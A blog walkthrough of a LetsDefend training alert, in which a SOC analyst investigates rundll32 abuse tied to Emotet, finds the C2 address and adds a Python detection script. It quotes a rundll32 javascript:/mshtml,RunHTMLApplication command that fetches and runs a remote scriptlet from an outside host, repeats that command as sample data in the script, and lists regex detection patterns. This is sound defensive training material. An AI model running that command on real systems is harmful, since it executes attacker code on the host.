LetsDefend SOC Walkthrough | SOC125 — Suspicious Rundll32 Activity
Hello, fellow defenders! It’s TopCyberDawg here, still taking down ALL the alerts from the SOC on the LetsDefend platform. In my pursuit to become a seasoned SOC analyst, my goal is to expose myself to as many practical labs and SOC alerts as possible, so I am prepared when the opportunity knocks.
Thankfully, LetsDefend has an amazing platform that mimics a security operation center, allowing users to work on alerts of different security scenarios.
So, walk with me as I dive into another alert…struggle a bit and sharpen my security skills!
What is LetsDefend?
LetsDefend is a hands-on Blue Team training platform that enables people to gain practical experience by investigating real cyber attacks inside a simulated SOC.
I’m a VIP+ member and have found great value in the package so far.
What is a SOC?
A Security Operations Center (SOC) is like the command center of an organization’s cybersecurity defense. It monitors digital activities, detects and analyzes threats, and takes action to protect against and respond to cyber incidents, using a combination of technology, processes, and skilled personnel.
What is Rundll32?
Rundll32.exe is a legitimate Windows system binary used to run functions exported by DLL (Dynamic Link Library) files. It takes a DLL name and an entry point, in the form rundll32.exe <dll>,<entrypoint> [arguments], and lets you call that function as if it were a standalone program, which Windows itself and third-party software use constantly (Control Panel applets, for example). Because it is signed, trusted, and present on every Windows host, it is also a favourite living-off-the-land binary for attackers: anything rundll32 loads runs under a process name that blends in with normal activity, which is why its command lines deserve close inspection.
Event ID 58: Suspicious Rundll32 Activity
This Event ID concerns our endpoint “172.16.17[.]49” showing suspicious Rundll32 activity. A suspicious EXE was observed on the endpoint as well.
Let’s verify whether it’s true or false.
Table of Contents
- Check SOC ticket queue
- Take ownership
- Create case
- Utilize Playbook
- Detection
- Analysis
- Containment
- Remediation
- Report Artifacts & IOCs
- Close ticket
Check the SOC ticket queue
Task 1
The Security Operations Center (SOC) ticket queue is a critical component in managing and responding to cybersecurity incidents. The reasons are Incident Tracking and Management, Prioritization and Triage, Accountability, Reporting, Trend Analysis, and Compliance and Audit Readiness.
LetsDefend’s practice SOC features 3 tabs named “Main Channel, Investigation Channel, and Closed Alerts”.
Navigate to the SOC by clicking “Practice” tab and select “Monitoring” then click the “Main Channel” tab.
Now we can see our SOC ticket queue and see some alerts with various severity levels.
*NOTE*: The action was Allowed.
Take ownership
Task 2
Each ticket in the queue is typically assigned to a specific analyst or team, ensuring clear responsibility and accountability for incident resolution. This fosters a structured and organized approach to incident management.
EventID: 58 looks like an interesting alert we can investigate and take down!
Create case
Task 3
Creating a case allows the SOC to prioritize incidents based on severity and potential impact. This helps in ensuring that the most critical issues are addressed first, optimizing resource allocation and response times.
We have already decided to investigate EventID: 58, and we will click the icon under “Action” to make it official.
Utilize Playbook
Task 4
Playbooks are crucial for a Security Operations Center for several reasons. A couple of those reasons are Consistency and Standardization. Playbooks ensure that incident responses are handled consistently across the team. By standardizing procedures, SOC analysts can respond to threats in a uniform manner, reducing the chances of errors or missed steps.
Once we have our case created we can begin running plays from our playbook.
Detection
Task 5
As Analysts, we must verify whether this alert is a true positive or a false positive.
Our SIEM fired off an alert after a suspicious URL appeared in our environment.
*Note* The action has been Allowed.
Analysis
Task 6
Analysis is vital for maintaining a robust cybersecurity posture. It allows organizations to proactively identify and mitigate threats, respond effectively to incidents, and continuously improve security measures. By investing in thorough analysis, organizations can better protect their assets, data, and reputation.
Our first play is to define the threat indicator.
Out of the available options, I believed it could only be “Other” or “Unknown outgoing network traffic”.
We can settle this by confirming in the alert details whether the Device Action was “Allowed” or “Blocked”. For this alert it was Allowed, so the outbound traffic was not blocked at the network boundary.
Now the fun can begin, and we can analyze the potential malware threat.
The Download link included in our alert has been flagged as malicious. Let’s plug it into Hybrid Analysis for sandboxing.
hxxps://files-ld.s3.us-east-2.amazonaws.com/a4513379dad5233afa402cc56a8b9222.zip (zip file)
The platform found no threat, but this does not mean we’re in the clear at all: a clean verdict on a ZIP container says nothing about what is inside it if the sandbox never extracted or detonated the contents. Next we check the hash to see what we can find out.
So, the hash has a bad reputation online. We can now run a Google search with the hash and ANY.RUN. ANY.RUN is another online sandbox platform, and when we search with the unique hash, we can see whether any public reports have already been generated for the file in question.
Here we can see the suspicious EXE, labeled as Trojan/Emotet. During the sandbox run the EXE was observed connecting out to a C2 address, and a dropped file was written to disk, which may give the threat actor persistence. Now I don’t expect to see “ws2help.exe” on our endpoint, but the report gives us an idea of what the attack looks like in terms of actions.
The next play for us to run through is whether someone accessed the C2 address. To do so, we need to check the wire (the network logs) and the endpoint itself.
The “Terminal History” shows that on the date of our alert a suspicious command was run on the endpoint.
This is not good! The command invokes rundll32.exe:
Command: rundll32.exe javascript:'../mshtml,RunHTMLApplication ';document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')
This is a known rundll32 abuse pattern (catalogued by LOLBAS and mapped to MITRE ATT&CK T1218.011, Signed Binary Proxy Execution: Rundll32). Rundll32 is handed javascript: as its “DLL” argument; the ..\mshtml part makes it resolve and load mshtml.dll and call the exported RunHTMLApplication entry point, which evaluates the rest of the line as JavaScript inside the HTA engine. GetObject('script:URL') then uses the script moniker to fetch a remote scriptlet and execute it. Note that the .exe extension in the URL is just a filename; whatever the server returns is run as script. In short, the command calls out to:
hxxp://ru-uid-507352920.pp.ru/KBDYAK.exe
We ran further analysis on the URL and confirmed it has been flagged as malicious.
Let’s check the URL with Hybrid Analysis now.
The domain is no longer active, so online sandbox efforts will not work. Let’s check the network connections on the endpoint to find the C2 address instead.
Looking at the listed IPs, only one connection falls on our alert date.
C2 Address: 67.68.210[.]95
We have two events involving our C2 address, but only one is tied to our alert date.
Let’s now gather some details on the address!
The address is hosted from Canada, and it has been flagged as malicious.
Containment
Task 7
Containment plays a pivotal role in cybersecurity by limiting the impact of security incidents, protecting data and operations, facilitating effective incident response, preserving evidence for forensic analysis, and ensuring compliance with legal and regulatory requirements.
Containment is necessary for this alert: the endpoint made an allowed outbound connection to a known-bad address, so it should be isolated from the network before any further cleanup.
Remediation actions
Task 8
Remediation is a fundamental component of a robust cybersecurity strategy. It involves fixing vulnerabilities and addressing security issues to prevent exploitation, protect data, maintain operations, and comply with regulations, ultimately contributing to a more secure and resilient organization.
- Educate our SOC with lessons learned so we are prepared for suspicious URLs.
- Create stronger detection rules for rundll32 abuse, such as javascript: or mshtml,RunHTMLApplication appearing in its command line.
- Educate the end user.
- Re-image the endpoint and restore from a known-good backup.
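To make the command analysed above and the “stronger detection rules” item concrete, here is an added example (my own code, not part of the LetsDefend lab or the original post) that triages rundll32 process-creation events for the javascript:/mshtml,RunHTMLApplication/GetObject('script:...') pattern, pulls the fetched URL out of the command line, correlates the hit with network connections from the same host in the minutes after the process started, and defangs the resulting IOCs for the analyst note. The event records, field names and timestamps are constructed sample data shaped like Sysmon-style process and network logs; they are not the lab’s real logs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not taken from the lab). One malicious rundll32
# launch, one benign Control Panel launch, and two connections to the C2 IP
# from the page, only one of which falls within the alert window.
PROCESS_EVENTS = [
    {
        "host": "172.16.17.49",
        "time": "2024-03-18T10:42:11",
        "image": "C:\\Windows\\System32\\rundll32.exe",
        "cmdline": "rundll32.exe javascript:'\\..\\mshtml,RunHTMLApplication ';"
                   "document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')",
    },
    {
        "host": "172.16.17.49",
        "time": "2024-03-18T09:00:00",
        "image": "C:\\Windows\\System32\\rundll32.exe",
        "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl",  # normal usage
    },
]
NETWORK_EVENTS = [
    {"host": "172.16.17.49", "time": "2024-03-18T10:42:13", "dst_ip": "67.68.210.95", "dst_port": 80},
    {"host": "172.16.17.49", "time": "2024-03-10T08:15:00", "dst_ip": "67.68.210.95", "dst_port": 80},
]

# Each pattern is one building block of the technique; a single hit is enough
# to flag, but reporting every matching reason helps the analyst explain it.
SUSPICIOUS_RUNDLL32 = [
    (re.compile(r"javascript:", re.I), "javascript: pseudo-protocol passed as the DLL argument"),
    (re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I), "mshtml,RunHTMLApplication entry point (HTA engine)"),
    (re.compile(r"GetObject\s*\(\s*['\"]script:", re.I), "GetObject('script:...') remote scriptlet fetch"),
]
# Pull the URL the script moniker fetches; stop at the closing quote or paren.
URL_RE = re.compile(r"script:(https?://[^'\")\s]+)", re.I)


def triage_rundll32(event):
    """Return (reasons, urls) for one process event; empty lists mean nothing suspicious."""
    if not event["image"].lower().endswith("rundll32.exe"):
        return [], []
    cmd = event["cmdline"]
    reasons = [why for rx, why in SUSPICIOUS_RUNDLL32 if rx.search(cmd)]
    urls = URL_RE.findall(cmd) if reasons else []
    return reasons, urls


def correlate_network(proc_event, network_events, window=timedelta(minutes=5)):
    """Network events from the same host starting at or after the process, within `window`."""
    t0 = datetime.fromisoformat(proc_event["time"])
    hits = []
    for ev in network_events:
        if ev["host"] != proc_event["host"]:
            continue
        delta = datetime.fromisoformat(ev["time"]) - t0
        if timedelta(0) <= delta <= window:
            hits.append(ev)
    return hits


def defang(indicator):
    """Neutralise a URL or IP for the analyst note: http -> hxxp and '.' -> '[.]'."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


def investigate(process_events, network_events):
    """Run triage over all process events and attach correlated, defanged IOCs."""
    findings = []
    for ev in process_events:
        reasons, urls = triage_rundll32(ev)
        if not reasons:
            continue
        iocs = [defang(u) for u in urls]
        iocs += [defang(n["dst_ip"]) for n in correlate_network(ev, network_events)]
        findings.append({"host": ev["host"], "time": ev["time"], "reasons": reasons, "iocs": iocs})
    return findings


if __name__ == "__main__":
    for f in investigate(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{f['host']} @ {f['time']}")
        for r in f["reasons"]:
            print("  reason:", r)
        for i in f["iocs"]:
            print("  ioc:   ", i)
```

The benign Control Panel launch is not flagged, the malicious one is flagged on all three patterns, and only the connection two seconds after the process start is attached as an IOC; the older connection to the same IP is reported separately or not at all, which mirrors the “two events, one on the alert date” observation above. The patterns here cover only this javascript: variant; a production rule should also look for rundll32 with no DLL argument, a DLL path outside System32/Program Files, or rundll32 making network connections at all.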
Report Artifacts & IOCs
Task 9
Once we’ve completed the analysis, we will document the findings in the “Analyst Note” section.
The document should include your reasoning, relevant data or observations, and steps taken during your investigation. It is critical as it provides a record of your analysis and can be used for future reference or in resolving similar alerts.
Close ticket
Task 10
The alert needs to be analyzed to determine if it is a true positive or a false positive. A true positive means the alert is legitimate and requires further action, whereas a false positive means that the alert is a false alarm.
Once the playbook has been completed and all inquiries have been dealt with, including the analysis phase, we must return to the Monitoring page within the Investigation channel to officially close the alert.
Navigate to the “Monitoring” section and “Investigation Channel”.
Click the close alert icon (Check symbol) to the far right.
Our newly closed alert can now be found in the “Closed Alerts” tab.
We can then see that under the “Results” column we have passed the investigation and can click the check icon to see a final report write-up on the entire investigation.
Conclusion
The investigation into the suspicious rundll32.exe activity has confirmed a true positive security incident. Behavioral analysis and threat intelligence correlation showed that the process was not running a legitimately installed DLL at all: it was handed a javascript: argument that loads mshtml.dll through a path-traversal trick and runs attacker-supplied script, far outside its normal usage pattern. The activity exhibited several red flags, including an obfuscated command line, an allowed outbound connection to a known-malicious address, and a dropped file that could serve as a persistence mechanism. Running the payload through rundll32.exe let the threat actor blend in with a legitimate, signed system process and slip past signature-based detection. Immediate containment measures were enacted, including isolating the affected host and terminating the malicious process. Additionally, the relevant indicators of compromise (IOCs) have been shared with the detection team to update SIEM rules and endpoint protection.
This incident highlights the need for closer monitoring of native Windows utilities and reinforces the importance of behavior-based detection on command-line content rather than process name alone. Ongoing investigation will focus on identifying the initial vector and assessing the full scope of the compromise.
Please consider following my journey on my social media accounts below. I will catch you all in the next one, peace.
Linkedin: @tijanhydara
Instagram: @topcyberdawg
Twitter: @topcyberdawg
YouTube: @topcyberdawg